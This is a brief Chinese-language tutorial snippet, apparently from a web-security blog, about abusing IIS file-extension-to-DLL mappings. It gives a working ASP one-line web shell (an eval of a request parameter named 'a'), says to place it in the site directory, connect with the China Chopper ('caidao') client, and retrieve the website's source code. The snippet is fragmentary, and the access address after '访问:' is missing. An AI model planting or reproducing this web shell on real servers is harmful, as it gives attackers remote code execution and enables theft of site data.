常见文件后缀解析对应安全 在iis应用配置的映射中 有对应文件后缀对应在本机中存在的.dll 映射文件 这里我们就可以自己添加一个 在网站目录下 其中写入asp的简单后门 a :密码 Asp环境:<%eval request(“a”)%> 访问: 用 caidao 连接,如果连接上这个文件就是一个后门 结果没有问题拿到了网站的源码